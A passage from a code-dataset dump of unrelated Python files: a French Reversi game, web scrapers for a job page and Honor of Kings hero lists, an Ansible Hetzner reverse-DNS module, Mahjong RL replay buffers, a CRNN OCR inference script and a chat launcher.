- 2 * 5, x + longueur + 2 * 5, y\n elif ancrage == 'w':\n rectangle(x, y - (hauteur + 2 * 5) // 2, x + hauteur + 2 * 5, y + (hauteur + 2 * 5) // 2, remplissage=couleur)\n texte(x + (longueur + 2 * 5) // 2, y, contenu, ancrage='center', taille=taille)\n return x, y - (hauteur + 2 * 5) // 2, x + hauteur + 2 * 5, y + (hauteur + 2 * 5) // 2\n elif ancrage == 'center':\n rectangle(x - (longueur + 2 * 5) // 2, y - (hauteur + 2 * 5) // 2, x + (longueur + 2 * 5) // 2,\n y + (hauteur + 2 * 5) // 2, remplissage=couleur)\n texte(x, y, contenu, ancrage='center', taille=taille)\n return x - (longueur + 2 * 5) // 2, y - (hauteur + 2 * 5) // 2, x + (longueur + 2 * 5) // 2, \\\n y + (hauteur + 2 * 5) // 2\n\n\ndef chercher_coups(plateau: list, joueur: int):\n \"\"\"\n Parcoure le plateau et recherche les coups disponibles.\n :param list plateau: Liste contenant le plateau.\n :param int joueur: Joueur actuel.\n :return list: Liste des coups possibles\n\n >>> chercher_coups([[B, B, B], \\\n [N, N, N], \\\n [V, V, B]], B)\n [(0, 2), (1, 2)]\n \"\"\"\n resultat = []\n for y in range(len(plateau)):\n for x in range(len(plateau[y])):\n if coup_valide(plateau, (x, y), joueur):\n resultat.append((x, y))\n return resultat\n\n\ndef verifier_victoire(plateau: list, joueur: int):\n \"\"\"\n Vérifie si un des deux joueurs remporte la partie.\n :param list plateau: Liste contenant le plateau.\n :param int joueur: Joueur en cours.\n :return tuple: Numéro du joueur gagnant, 0 si le jeu continu et booléen symbolisant une victoire écrasante.\n\n >>> verifier_victoire([[B, N, B], \\\n [N, N, N], \\\n [B, N, B]], B)\n (0, False)\n \"\"\"\n compteur_b = 0\n compteur_n = 0\n for y, ligne in enumerate(plateau):\n for x, case in enumerate(ligne):\n if coup_valide(plateau, (x, y), joueur) or coup_valide(plateau, (x, y), joueur * -1):\n return 0, False\n if case == N:\n compteur_n += 1\n elif case == B:\n compteur_b += 1\n if compteur_b > compteur_n:\n return B, abs(compteur_n - compteur_b) > 10\n elif compteur_n > compteur_b:\n return N, abs(compteur_n - compteur_b) > 10\n else:\n return None, False\n\n\ndef explore(plateau: list, case: tuple, direction: tuple):\n \"\"\"\n Explore une direction à partir d'une case pour\n :param list plateau: Liste contenant le plateau.\n :param tuple case: Coordonées de la case.\n :param tuple direction: Direction de la vérification.\n :return list: Liste des cases.\n\n >>> explore([[V, B, B, V], \\\n [B, N, N, B], \\\n [B, N, N, B], \\\n [V, B, B, N]], (0, 0), (1, 1))\n [0, 0, 0]\n \"\"\"\n resulat = []\n x_case, y_case = case[0] + direction[0], case[1] + direction[1]\n\n explorer = True\n while explorer:\n if 0 <= x_case < len(plateau) and 0 <= y_case < len(plateau) and (\n plateau[y_case][x_case] == B or plateau[y_case][x_case] == N):\n resulat.append(plateau[y_case][x_case])\n x_case += direction[0]\n y_case += direction[1]\n else:\n explorer = False\n\n return resulat\n\n\ndef coup_valide(plateau: list, case: tuple, joueur: int):\n \"\"\"\n Détermine si un coup est autorisé.\n :param list plateau: Liste contenant le plateau.\n :param tuple case: Coordonées de la case.\n :param int joueur: Numéro du joueur.\n :return bool: Le coup est autorisé.\n\n >>> coup_valide([[V, B, B, V], \\\n [B, N, N, B], \\\n [B, N, N, B], \\\n [V, B, B, V]], (0, 0), N)\n False\n \"\"\"\n if plateau[case[1]][case[0]] != V and plateau[case[1]][case[0]] != C:\n return False\n for direction in DIRECTIONS:\n ligne = explore(plateau, case, direction)\n if len(ligne) == 0:\n continue\n if ligne[0] == abs(joueur - 1) and joueur in ligne:\n return True\n return False\n\n\ndef retournement(plateau: list, case: tuple, pions: list, joueur: int, direction: tuple):\n \"\"\"\n Retourne les pions nécessaires.\n :param list plateau: Liste contenant le plateau.\n :param tuple case: Coordonée de la case.\n :param tuple pions: Liste de coordonées des pions à retourner.\n :param int joueur: Numéro du joueur.\n :param tuple direction: Direction de la ligne.\n \"\"\"\n x, y = case\n for pion in pions:\n x += direction[0]\n y += direction[1]\n if joueur not in pions:\n return\n if pion == joueur or pion == V:\n break\n elif pion == abs(joueur - 1):\n plateau[y][x] = joueur\n\n\ndef sauvegarder(plateau: list, joueur: int, nom_fichier: str):\n \"\"\"\n Sauvegarde la partie actuelle dans un fichier.\n :param list plateau: Liste contenant le plateau.\n :param int joueur: Joueur actuel.\n :param str nom_fichier: Nom de la sauvegarde à écraser.\n \"\"\"\n if nom_fichier is None:\n nom_fichier = datetime.datetime.now().strftime(\"%d-%m-%Y %H-%M\") + \".rsi\"\n fichier = open(nom_fichier, \"w\")\n\n fichier.write(str(joueur))\n for ligne in plateau:\n fichier.write(\"\\n\")\n for case in ligne:\n fichier.write(str(case))\n fichier.close()\n\n\ndef affiche_victoire(gagnant: int, ecrasante: bool):\n \"\"\"\n Affiche le message de fin de partie.\n :param int gagnant: Numéro du joueur gagnant.\n :param bool ecrasante: Victoire avec plus de 10 pions d'avance.\n \"\"\"\n if gagnant is None:\n rectangle(0, len(plateau) * TAILLE_CASE, len(plateau) * TAILLE_CASE,\n len(plateau) * TAILLE_CASE + regles['taille_barre'], remplissage=\"white\")\n texte(10, 10 + len(plateau) * TAILLE_CASE, \"Égalité !\")\n elif gagnant == N:\n rectangle(0, len(plateau) * TAILLE_CASE, len(plateau) * TAILLE_CASE,\n len(plateau) * TAILLE_CASE + regles['taille_barre'], remplissage=\"black\")\n texte(10, 10 + len(plateau) * TAILLE_CASE,\n \"Victoire \" + (\"écrasante \" if ecrasante else \"\") + \"des noirs !\",\n couleur=\"white\")\n elif gagnant == B:\n rectangle(0, len(plateau) * TAILLE_CASE, len(plateau) * TAILLE_CASE,\n len(plateau) * TAILLE_CASE + regles['taille_barre'], remplissage=\"white\")\n texte(10, 10 + len(plateau) * TAILLE_CASE,\n \"Victoire \" + (\"écrasante \" if ecrasante else \"\") + \"des blancs !\")\n\n\ndef dessine_menu(regles: dict, boutons: dict):\n \"\"\"\n Dessine le menu principal et modifie les variables de jeu.\n :param dict regles: Variables de jeu.\n :param dict boutons: Dictionnaire ou ajouter les coordonnées des boutons.\n \"\"\"\n efface_tout()\n image(TAILLE_PLATEAU * TAILLE_CASE // 2, TAILLE_PLATEAU * TAILLE_CASE // 2, \"background.gif\", ancrage='center')\n texte(TAILLE_PLATEAU * TAILLE_CASE // 2, TAILLE_CASE, \"REVERSI\", taille=50, couleur=\"black\", ancrage='n')\n\n boutons[\"nouvelle_partie\"] = \\\n dessine_bouton(TAILLE_PLATEAU * TAILLE_CASE // 2, 3 * TAILLE_CASE, \"Nouvelle partie\", ancrage='center',\n largeur=\"Afficher les coups disponibles\")\n boutons[\"charger_partie\"] = \\\n dessine_bouton(TAILLE_PLATEAU * TAILLE_CASE // 2, 4 * TAILLE_CASE, \"Charger une partie\", ancrage='center',\n largeur=\"Afficher les coups disponibles\")\n boutons[\"afficher_coups\"] = \\\n dessine_bouton(TAILLE_PLATEAU * TAILLE_CASE // 2, 5 * TAILLE_CASE, \"Afficher les coups disponibles\",\n ancrage='center', largeur=\"Afficher les coups disponibles\",\n couleur=\"green\" if regles[\"afficher_coups\"] else \"red\")\n boutons[\"quitter\"] = dessine_bouton(TAILLE_PLATEAU * TAILLE_CASE // 2, 7 * TAILLE_CASE, \"Quitter\", ancrage='center')\n\n\ndef clone(plateau: list):\n \"\"\"\n Retourne un clone du plateau.\n :param plateau: Plateau à cloner.\n :return: Plateau cloné.\n\n >>> clone([[1, 1, 1], \\\n [1, 1, 1], \\\n [1, 1, 1]])\n [[1, 1, 1], [1, 1, 1], [1, 1, 1]]\n \"\"\"\n clone_plateau = []\n for list in plateau:\n clone_plateau.append(list.copy())\n return clone_plateau\n\n\nregles = {'joueur': N,\n 'nouvelle_partie': True,\n 'afficher_coups': False,\n 'sauvegarde': None}\nex_plateau = None\nboutons = {}\n\nif __name__ == \"__main__\":\n\n cree_fenetre(0, 0)\n regles['taille_barre'] = taille_texte('X')[1] - taille_texte('X')[1] % 5 + 20\n ferme_fenetre()\n\n testmod()\n cree_fenetre(TAILLE_PLATEAU * TAILLE_CASE, TAILLE_PLATEAU * TAILLE_CASE + regles['taille_barre'])\n\n menu = True\n while menu:\n dessine_menu(regles, boutons)\n x, y = attend_clic_gauche()\n\n for bouton in boutons:\n if int(boutons[bouton][0]) <= x <= int(boutons[bouton][2]) and \\\n int(boutons[bouton][1]) <= y <= int(boutons[bouton][3]):\n if bouton == \"nouvelle_partie\":\n menu = False\n elif bouton == \"charger_partie\":\n regles['nouvelle_partie'] = False\n menu = False\n elif bouton == \"afficher_coups\":\n regles['afficher_coups'] = not regles['afficher_coups']\n break\n elif bouton == \"quitter\":\n sys.exit()\n\n if regles['nouvelle_partie']:\n\n regles['joueur'] = N\n plateau = init_plateau(TAILLE_PLATEAU)\n\n plateau[TAILLE_PLATEAU // 2 - 1][TAILLE_PLATEAU // 2 - 1] = B\n plateau[TAILLE_PLATEAU // 2][TAILLE_PLATEAU // 2] = B\n plateau[TAILLE_PLATEAU // 2 - 1][TAILLE_PLATEAU // 2] = N\n plateau[TAILLE_PLATEAU // 2][TAILLE_PLATEAU // 2 - 1] = N\n\n else:\n\n nom_fichier = input(\"Entrer le nom du fichier de sauvegarde : \")\n\n fichier = open(nom_fichier, \"r\")\n lignes = fichier.readlines()\n regles['joueur'] = int(lignes[0])\n\n plateau = []\n for i in range(TAILLE_PLATEAU):\n ligne = []\n for case in lignes[i + 1].strip():\n if case == str(B) or case == str(N):\n ligne.append(int(case))\n else:\n ligne.append(case)\n plateau.append(ligne)\n\n regles['afficher_coups'] = False\n for ligne in plateau:\n if C in ligne:\n regles['afficher_coups'] = True\n break\n\n fichier.close()\n regles['sauvegarde'] = nom_fichier\n\n gagnant = None\n ecrasante = False\n\n # BOUCLE PRINCIPALE\n while True:\n\n coups_dispo = chercher_coups(plateau, regles['joueur'])\n\n if regles['afficher_coups']:\n for case in coups_dispo:\n plateau[case[1]][case[0]] = C\n\n dessine_plateau(plateau, ex_plateau, boutons, regles['joueur'])\n\n if verifier_victoire(plateau, regles['joueur'])[0] != 0:\n gagnant, ecrasante = verifier_victoire(plateau, regles['joueur'])\n break\n\n if len(coups_dispo) == 0:\n rectangle(0, len(plateau) * TAILLE_CASE, len(plateau) * TAILLE_CASE,\n len(plateau) * TAILLE_CASE + regles['taille_barre'], remplissage=\"white\")\n texte(10, 10 + len(plateau) * TAILLE_CASE, \"Les \" + (\n \"blancs\" if regles['joueur'] == B else \"noirs\") + \" ne peuvent pas jouer, ils passent leur tour.\")\n mise_a_jour()\n attente(3)\n regles['joueur'] = abs(regles['joueur'] - 1)\n continue\n\n x, y = attend_clic_gauche()\n\n if boutons[\"quitter\"][0] <= x <= boutons[\"quitter\"][2] and boutons[\"quitter\"][1] <= y <= boutons[\"quitter\"][3]:\n sauvegarder(plateau, regles['joueur'], regles['sauvegarde'])\n sys.exit()\n if \"annuler\" in boutons:\n if boutons[\"annuler\"][0] <= x <= boutons[\"annuler\"][2] and \\\n boutons[\"annuler\"][1] <= y <= boutons[\"annuler\"][3]:\n regles['joueur'] = abs(regles['joueur'] - 1)\n plateau = clone(ex_plateau)\n ex_plateau = None\n continue\n\n for case in coups_dispo:\n plateau[case[1]][case[0]] = V\n\n x_case, y_case = pixel_vers_case((x, y), TAILLE_CASE)\n\n if pixel_vers_case((x, y), TAILLE_CASE) not in coups_dispo:\n continue\n\n ex_plateau = clone(plateau)\n plateau[y_case][x_case] = regles['joueur']\n\n for direction in DIRECTIONS:\n ligne = explore(plateau, (x_case, y_case), direction)\n retournement(plateau, (x_case, y_case), ligne, regles['joueur'], direction)\n\n regles['joueur'] = abs(regles['joueur'] - 1)\n\n affiche_victoire(gagnant, ecrasante)\n attend_fermeture()\n","sub_path":"Projet final/reversi.py","file_name":"reversi.py","file_ext":"py","file_size_in_byte":19550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"125935721","text":"'''\n使用urllib.request请求一个网页内容,并把内容打印出来\n'''\nfrom urllib import request\n\nif __name__ == '__main__':\n\n url = 'https://jobs.zhaopin.com/CZ507343230J00057937812.htm'\n # 打开相应的url并把相应页面作为返回\n rsp = request.urlopen(url)\n\n # 把返回结果读取出来\n # 读取出来内容类型为bytes\n html = rsp.read()\n\n #如果想把bytes内容转换成字符串,需要解码\n html = html.decode('utf-8')\n print(html)","sub_path":"Spider/v1.py","file_name":"v1.py","file_ext":"py","file_size_in_byte":489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"238723556","text":"# -*- coding: utf-8 -*-\n\nfrom photo_downloader2 import PhotoDownloader\nfrom photo_task_gen import PhotoTaskGenerator\nfrom photo_reader import PhotoReader\nimport threading\n\nclass Downloader(threading.Thread):\n _download_size = 10\n\n def __init__(self):\n super(Downloader, self).__init__()\n self.photo_taskGenerator = PhotoTaskGenerator()\n self.photo_reader = PhotoReader(self.photo_taskGenerator)\n\n def run(self):\n self.photo_reader.start()\n for i in range(self._download_size):\n PhotoDownloader(self.photo_taskGenerator).run()\n\nif __name__ == '__main__':\n downloader = Downloader()\n downloader.start()","sub_path":"downloader/downloader.py","file_name":"downloader.py","file_ext":"py","file_size_in_byte":661,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"377013155","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\n# Copyright: (c) 2019, Hetzner Cloud GmbH \n# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)\n\nfrom __future__ import absolute_import, division, print_function\n\n__metaclass__ = type\n\nANSIBLE_METADATA = {\n \"metadata_version\": \"1.1\",\n \"status\": [\"preview\"],\n \"supported_by\": \"community\",\n}\n\nDOCUMENTATION = \"\"\"\n---\nmodule: hcloud_rdns\n\nshort_description: Create and manage reverse DNS entries on the Hetzner Cloud.\n\nversion_added: \"2.9\"\n\ndescription:\n - Create, update and delete reverse DNS entries on the Hetzner Cloud.\n\nauthor:\n - Lukas Kaemmerling (@lkaemmerling)\n\noptions:\n server:\n description:\n - The name of the Hetzner Cloud server you want to add the reverse DNS entry to.\n type: str\n required: true\n ip_address:\n description:\n - The IP address that should point to I(dns_ptr).\n type: str\n required: true\n dns_ptr:\n description:\n - The DNS address the I(ip_address) should resolve to.\n - Omit the param to reset the reverse DNS entry to the default value.\n type: str\n state:\n description:\n - State of the reverse DNS entry.\n default: present\n choices: [ absent, present ]\n type: str\n\nrequirements:\n - hcloud-python >= 1.3.0\n\nextends_documentation_fragment: hcloud\n\"\"\"\n\nEXAMPLES = \"\"\"\n- name: Create a reverse DNS entry for a server\n hcloud_rdns:\n server: my-server\n ip_address: 123.123.123.123\n dns_ptr: example.com\n state: present\n\n- name: Ensure the reverse DNS entry is absent (remove if needed)\n hcloud_rdns:\n server: my-server\n ip_address: 123.123.123.123\n dns_ptr: example.com\n state: absent\n\"\"\"\n\nRETURN = \"\"\"\nhcloud_rdns:\n description: The reverse DNS entry\n returned: always\n type: complex\n contains:\n server:\n description: Name of the server\n type: str\n returned: always\n sample: my-server\n ip_address:\n description: The IP address that point to the DNS ptr\n type: str\n returned: always\n sample: 123.123.123.123\n dns_ptr:\n description: The DNS that resolves to the IP\n type: str\n returned: always\n sample: example.com\n\"\"\"\n\nfrom ansible.module_utils.basic import AnsibleModule\nfrom ansible.module_utils._text import to_native\nfrom ansible.module_utils.hcloud import Hcloud\nfrom ansible.module_utils.network.common import utils\n\ntry:\n from hcloud import APIException\nexcept ImportError:\n APIException = None\n\n\nclass AnsibleHcloudReverseDNS(Hcloud):\n def __init__(self, module):\n super(AnsibleHcloudReverseDNS, self).__init__(module, \"hcloud_rdns\")\n self.hcloud_server = None\n self.hcloud_rdns = None\n\n def _prepare_result(self):\n return {\n \"server\": to_native(self.hcloud_server.name),\n \"ip_address\": to_native(self.hcloud_rdns[\"ip_address\"]),\n \"dns_ptr\": to_native(self.hcloud_rdns[\"dns_ptr\"]),\n }\n\n def _get_server(self):\n try:\n self.hcloud_server = self.client.servers.get_by_name(\n self.module.params.get(\"server\")\n )\n except APIException as e:\n self.module.fail_json(msg=e.message)\n\n def _get_rdns(self):\n ip_address = self.module.params.get(\"ip_address\")\n if utils.validate_ip_address(ip_address):\n if self.hcloud_server.public_net.ipv4.ip == ip_address:\n self.hcloud_rdns = {\n \"ip_address\": self.hcloud_server.public_net.ipv4.ip,\n \"dns_ptr\": self.hcloud_server.public_net.ipv4.dns_ptr,\n }\n else:\n self.module.fail_json(msg=\"The selected server does not have this IP address\")\n elif utils.validate_ip_v6_address(ip_address):\n for ipv6_address_dns_ptr in self.hcloud_server.public_net.ipv6.dns_ptr:\n if ipv6_address_dns_ptr[\"ip\"] == ip_address:\n self.hcloud_rdns = {\n \"ip_address\": ipv6_address_dns_ptr[\"ip\"],\n \"dns_ptr\": ipv6_address_dns_ptr[\"dns_ptr\"],\n }\n else:\n self.module.fail_json(msg=\"The given IP address is not valid\")\n\n def _create_rdns(self):\n self.module.fail_on_missing_params(\n required_params=[\"dns_ptr\"]\n )\n params = {\n \"ip\": self.module.params.get(\"ip_address\"),\n \"dns_ptr\": self.module.params.get(\"dns_ptr\"),\n }\n\n if not self.module.check_mode:\n self.hcloud_server.change_dns_ptr(**params).wait_until_finished()\n\n self._mark_as_changed()\n self._get_server()\n self._get_rdns()\n\n def _update_rdns(self):\n dns_ptr = self.module.params.get(\"dns_ptr\")\n if dns_ptr != self.hcloud_rdns[\"dns_ptr\"]:\n params = {\n \"ip\": self.module.params.get(\"ip_address\"),\n \"dns_ptr\": dns_ptr,\n }\n\n if not self.module.check_mode:\n self.hcloud_server.change_dns_ptr(**params).wait_until_finished()\n\n self._mark_as_changed()\n self._get_server()\n self._get_rdns()\n\n def present_rdns(self):\n self._get_server()\n self._get_rdns()\n if self.hcloud_rdns is None:\n self._create_rdns()\n else:\n self._update_rdns()\n\n def delete_rdns(self):\n self._get_server()\n self._get_rdns()\n if self.hcloud_rdns is not None:\n if not self.module.check_mode:\n self.hcloud_server.change_dns_ptr(ip=self.hcloud_rdns['ip_address'], dns_ptr=None)\n self._mark_as_changed()\n self.hcloud_rdns = None\n\n @staticmethod\n def define_module():\n return AnsibleModule(\n argument_spec=dict(\n server={\"type\": \"str\", \"required\": True},\n ip_address={\"type\": \"str\", \"required\": True},\n dns_ptr={\"type\": \"str\"},\n state={\n \"choices\": [\"absent\", \"present\"],\n \"default\": \"present\",\n },\n **Hcloud.base_module_arguments()\n ),\n supports_check_mode=True,\n )\n\n\ndef main():\n module = AnsibleHcloudReverseDNS.define_module()\n\n hcloud = AnsibleHcloudReverseDNS(module)\n state = module.params[\"state\"]\n if state == \"absent\":\n hcloud.delete_rdns()\n elif state == \"present\":\n hcloud.present_rdns()\n\n module.exit_json(**hcloud.get_result())\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"env/lib/python3.9/site-packages/ansible/modules/cloud/hcloud/hcloud_rdns.py","file_name":"hcloud_rdns.py","file_ext":"py","file_size_in_byte":6766,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"12899423","text":"import numpy as np\nimport random\n\nclass SimpleMahjongBuffer():\n\n def __init__(self, size=10000):\n self.size = size\n self.s = np.zeros([size, 34, 4, 1], dtype=np.float32)\n self.sp = np.zeros([size, 34, 4, 1], dtype=np.float32)\n self.r = np.zeros([size], dtype=np.float32)\n self.d = np.zeros([size], dtype=np.float32)\n\n self.filled = -1 # up to this index, the buffer is filled\n self.tail = 0 # index to which an experience to be stored next\n\n def __len__(self):\n return self.filled\n\n def append(self, s, r, s_next, done):\n self.s[self.tail] = s\n self.r[self.tail] = r\n self.sp[self.tail] = s_next\n # self.mu[self.tail] = mu\n self.d[self.tail] = done\n\n self.filled = max(self.filled, self.tail)\n self.tail += 1\n if self.tail == self.size:\n self.tail = 0\n\n def sample(self, truncated_steps):\n index = np.random.randint(low=truncated_steps, high=self.filled)\n\n s = np.vstack((self.s[index - truncated_steps:index], self.sp[None, index]))\n ret_tuple = (s,\n self.r[index - truncated_steps:index],\n self.d[index - truncated_steps:index])\n\n return ret_tuple\n\n\n\n\nclass SimpleMahjongBufferPER():\n # Record Episodes\n # Prioritized Experience Replay\n class SumTree:\n def __init__(self, size, scale):\n self.size = size\n self.scale = scale\n self.tree_nodes = np.zeros(2 * size, dtype=np.float32)\n\n def sum(self):\n return self.tree_nodes[1]\n\n def add(self, index, weight):\n index += self.size\n self.tree_nodes[index] = weight ** self.scale\n while index > 0:\n index = index // 2\n self.tree_nodes[index] = self.tree_nodes[index * 2] + self.tree_nodes[index * 2 + 1]\n\n def sample_subtree(self, root):\n if root >= self.size:\n return root - self.size, self.tree_nodes[root] / self.tree_nodes[1]\n pl = self.tree_nodes[root * 2]\n pr = self.tree_nodes[root * 2 + 1]\n s = pl + pr\n pl /= s\n pr /= s\n if random.random() < pl:\n return self.sample_subtree(root * 2)\n else:\n return self.sample_subtree(root * 2 + 1)\n\n def sample(self):\n if self.tree_nodes[1] == 0:\n raise Exception(\"Error! Sampling from empty buffer\")\n return self.sample_subtree(1)\n pass\n\n def __init__(self, size=1024, episode_length=256, priority_eps=10000,\n priority_scale=0.1, IS_scale=1.0, saved=None):\n # Mahjong episode length usually <256\n self.size = size\n self.length = np.zeros([size,], dtype=np.int)\n self.s = np.zeros([size, episode_length, 34, 4, 1], dtype=np.float16)\n self.r = np.zeros([size, episode_length], dtype=np.float32)\n self.d = np.zeros([size, episode_length], dtype=np.float16)\n\n self.IS_scale = IS_scale\n self.priority_scale = priority_scale\n self.priority_eps = priority_eps\n\n self.filled_size = 0 # up to this index, the buffer is filled\n self.tail = 0 # index to which an experience to be stored next\n\n tree_size = 2 ** int(np.ceil(np.log2(size)))\n self.sum_tree = SimpleMahjongBufferPER.SumTree(tree_size, priority_scale)\n self.sum_steps = 0\n self.min_length = 0\n self.max_length = 0\n\n # self.infinity = 1e9\n\n # # initialize priority of saved episodes to inf\n # for i in range(self.saved_size):\n # self.sum_tree.add(i, self.infinity)\n # length = self.length[i]\n # self.sum_steps += length\n # self.min_length = min(self.min_length, length)\n # self.max_length = max(self.max_length, length)\n\n def append_episode(self, s, r, d, weight=0):\n length = len(r)\n self.s[self.tail, :length+1] = s\n self.r[self.tail, :length] = r\n self.d[self.tail, :length] = d\n self.length[self.tail] = length\n\n self.sum_tree.add(self.tail, weight + self.priority_eps)\n\n self.tail = (self.tail + 1) % self.size\n self.filled_size = min(self.filled_size + 1, self.size)\n\n\n def sample_episode(self):\n e_index, e_weight = self.sum_tree.sample()\n\n d = self.d[e_index, :self.length[e_index]]\n s = self.s[e_index, :self.length[e_index]+1]\n r = self.r[e_index, :self.length[e_index]]\n # pi = self.pi[e_index]\n\n return s, r, d, self.length[e_index], e_index, e_weight\n\n # def sample_episode_batch(self, batch_size=32):\n # states_b = []\n # actions_b = []\n # pi_b = []\n # r_b = []\n # done_b = []\n # length_b = []\n # mask_b = []\n # indices = []\n # weights = []\n # for i in range(batch_size):\n # states, actions, pi, r, done, length, mask, e_index, e_weight = self.sample_episode()\n # states_b.append(states)\n # actions_b.append(actions)\n # pi_b.append(pi)\n # r_b.append(r)\n # done_b.append(done)\n # length_b.append(length)\n # mask_b.append(mask)\n # indices.append(e_index)\n # weights.append((length/e_weight/self.sum_steps) ** self.IS_scale)\n #\n # max_l = max(length_b)\n # states_b = np.stack(states_b, axis=0)[:, :max_l+1]\n # actions_b = np.stack(actions_b, axis=0)[:, :max_l]\n # pi_b = np.stack(pi_b, axis=0)[:, :max_l]\n # r_b = np.stack(r_b, axis=0)[:, :max_l]\n # done_b = np.stack(done_b, axis=0)\n # mask_b = np.stack(mask_b, axis=0)\n # weights_b = np.stack(weights, axis=0)\n #\n # return states_b, actions_b, pi_b, r_b, done_b, length_b, mask_b, indices, weights_b","sub_path":"AI/buffer.py","file_name":"buffer.py","file_ext":"py","file_size_in_byte":5903,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"531651914","text":"import os\nimport sys\nimport time\nimport argparse\nimport numpy as np\nimport cv2\nimport torch\nfrom torch.autograd import Variable\n\nsys.path.append(os.getcwd())\nfrom .utils import utils\nfrom .Net import crnn_vgg\nfrom .config import config\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--image_path', type=str,\n default='/home/lyb/ocr/text_det_reg/dataset/images_sentences1/images/000000_00_00.jpg',\n help='the path to your image')\nopt = parser.parse_args()\n\n\ndef get_alphabets(alphabet_path):\n # 获取字符表\n alphabets = utils.generate_alphabets(alphabet_path=alphabet_path)\n nclass = len(alphabets) + 1\n return nclass, alphabets\n\n\ndef process_image(image):\n image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n dst = cv2.fastNlMeansDenoising(image, None, h=10, templateWindowSize=7, searchWindowSize=21)\n ret, image = cv2.threshold(dst, 0, 255, cv2.THRESH_BINARY + cv2.THRESH_OTSU)\n h, w = image.shape\n image = cv2.resize(image, (0, 0), fx=config.imgH / h, fy=config.imgH / h, interpolation=cv2.INTER_CUBIC)\n # 不足的,补充白色区域\n image = padding_image(image)\n\n image = (np.reshape(image, (32, config.imgW, 1))).transpose(2, 0, 1)\n # 预处理,转换为torchTensor\n image = preprocess(image)\n return image\n\ndef padding_image(image_):\n h, w = image_.shape\n img = 255. * np.ones((config.imgH, config.imgW))\n if w < config.imgW:\n img[:, :w] = image_\n else:\n img = cv2.resize(image_, (config.imgW, config.imgH), interpolation=cv2.INTER_CUBIC)\n img = np.uint8(img)\n return img\n\ndef preprocess(image_):\n image = image_.astype(np.float32) / 255.\n image = torch.from_numpy(image).type(torch.FloatTensor)\n image.sub_(config.mean).div_(config.std)\n return image\n\n\ndef crnn_recognition(image, model, device, alphabets):\n converter = utils.strLabelConverter(alphabets)\n image = Variable(image)\n image = image.to(device)\n\n model.eval()\n preds = model(image) # (141, batch_size, 6773)\n\n _, preds = preds.max(2) # (141, batch_szie)\n preds = preds.transpose(1, 0).contiguous().view(-1)\n\n preds_size = torch.IntTensor([preds.size(0)])\n sim_pred = converter.decode(preds.data, preds_size.data, raw=False)\n print('results: {0}'.format(sim_pred))\n return 0\n\n\ndef infer_recognition(image_batch):\n return 0\n\n\nif __name__ == '__main__':\n nclass, alphabets = get_alphabets(alphabet_path='./dataset/alphabets.txt')\n\n model = crnn_vgg.CRNN(32, 1, nclass, 256)\n device = torch.device('cpu')\n # device = torch.device('cuda:2') if torch.cuda.is_available() else torch.device('cpu')\n model.to(device)\n # crnn_model_path = './models/crnn_best.pth'\n crnn_model_path = './models/crnn_Rec_ocr_50_0.00478125.pth'\n print('===> loading pretrained model from {}'.format(crnn_model_path))\n model.load_state_dict(torch.load(crnn_model_path, map_location='cpu'))\n # model.load_state_dict(torch.load(crnn_model_path))\n\n start_time = time.time()\n # ------在此输入图片路径-------\n image = cv2.imread(opt.image_path)\n image = process_image(image)\n image = image.view(1, *image.size())\n\n crnn_recognition(image, model, device, alphabets)\n\n finish_time = time.time()\n print('elapsed time of recognition: {0}'.format(finish_time - start_time))\n\n\n\n","sub_path":"CRNN/infer.py","file_name":"infer.py","file_ext":"py","file_size_in_byte":3349,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"64734394","text":"import socket\nimport threading\nimport sys\n\nfrom server import Server\nfrom client import Client\n\nif __name__ == \"__main__\":\n\n if len(sys.argv) > 1:\n if len(sys.argv) == 3:\n try:\n client = Client(sys.argv[1], int(sys.argv[2]))\n except:\n print(\"Error! Type a number.\")\n else:\n client = Client(sys.argv[1])\n else:\n server = Server()\n server.run()\n","sub_path":"_python_chat/chat.py","file_name":"chat.py","file_ext":"py","file_size_in_byte":440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"425714534","text":"# -*- coding: utf-8 -*-\n\"\"\"\n获取英雄列表,以及对应的页面url\n\"\"\"\nfrom selenium.webdriver.common.action_chains import ActionChains\nfrom selenium import webdriver\nimport pandas as pd\n\ndriver = webdriver.PhantomJS(executable_path=r'D:/Program Files/phantomjs-2.1.1-windows/bin/phantomjs')\n\ndriver.get(\"http://pvp.qq.com/web201605/herolist.shtml\")\n\nheros_node=driver.find_elements_by_xpath('/html/body/div[3]/div/div/div[2]/div[2]/ul/li/a')\n\nhero_list=[]\nurl_list=[]\nfor node in heros_node:\n hero_list.append(node.text)\n url_list.append(node.get_attribute('href'))\n \ndata=pd.DataFrame({'hero':hero_list,'url1':url_list})\n\ndriver.get('http://news.17173.com/z/pvp/yxtj/index.shtml')\n\nnodes=driver.find_elements_by_xpath('//*[@id=\"jsheroshow\"]/li/a')\n\nhero_list=[]\nurl_list=[]\nfor node in nodes:\n hero_list.append(node.text)\n url_list.append(node.get_attribute('href'))\n \ntmp=pd.DataFrame({'hero':hero_list,'url2':url_list})\n\ndata=pd.merge(data,tmp,on='hero')\n\ndata.to_csv('D:/Python project/王者荣耀/url.csv')\ndriver.close() \n\n##4399\ndriver.get(\"http://news.4399.com/gonglue/wzlm/daoju/\")\nactions = ActionChains(driver)\nclick_node=driver.find_element_by_xpath('//*[@id=\"hero_more\"]/a')\nactions.click(click_node)\nactions.click(click_node)\nactions.perform()\nheros_node=driver.find_elements_by_xpath('//*[@id=\"hreo_list\"]/li/a')\n\nitem_list=[]\nurl_list=[]\nfor node in heros_node:\n item_list.append(node.text)\n url_list.append(node.get_attribute('href'))\n \ndata=pd.DataFrame({'item':item_list,'url1':url_list}) \ndata.to_csv('D:/Python project/王者荣耀/item_url.csv') 